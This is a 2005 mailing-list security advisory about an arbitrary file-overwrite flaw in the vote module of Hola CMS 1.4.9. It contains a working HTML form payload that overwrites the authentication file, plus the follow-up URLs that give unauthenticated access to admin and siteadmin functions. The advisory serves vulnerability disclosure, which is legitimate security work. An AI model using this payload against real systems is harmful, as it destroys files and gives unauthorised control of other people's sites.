[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050312224555.4397.qmail@www.securityfocus.com>
Date: 12 Mar 2005 22:45:55 -0000
From: Virginity Security <advisory05@...fiweb.de>
To: bugtraq@...urityfocus.com
Subject: Virginity Security Advisory 2005-001 : Hola CMS - File
destruction and System access
- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-001
- - - --------------------------------------------------------------------
DATE : 2005-03-12 15:45 GMT
TYPE : remote
VERSIONS AFFECTED : <== hola-cms-1.4.9 (http://holacms.drunkencat.net/)
AUTHOR : Virginity
ADVISORY NUMBER : 003
- - - --------------------------------------------------------------------
Description:
I found a serious security hole in Hola CMS:
The Vote-Module doesn't check wether the submitted "vote_filename" variable
is in the holaDB/votes/ directory where it should be.
So anything could be added in there. This can be used to manipluate or destroy system files
- not only the ones in the CMS but every file on the whole server!!!
Below i will show an example how to destroy login-authentification file and gaining access
to admin-functions!
Author of the Software has been notified.
- - - --------------------------------------------------------------------
Example:
Create this html form (that makes it easier to use it on multiple targets):
<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>
Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!
But thats just for that lame CMS... of course you could attack operating-system files
or do other funny things. NO! Please don't do it! Just test on your own system :P
- - - --------------------------------------------------------------------
Solution:
Author wasn't nice last time so no more help for this piece of vuln software.
But i strongly reccomend you to use some other software since there are
still many other vulns in it!
- - - --------------------------------------------------------------------
Personal note:
So you thought this girl couldn't do it anymore? Here it goes... read and enjoy!
For contact please don't mail me cuz my mailbox is full of spam :(
But if you want to find me on IRC you'll make it!
- - - --------------------------------------------------------------------
Powered by blists - more mailing lists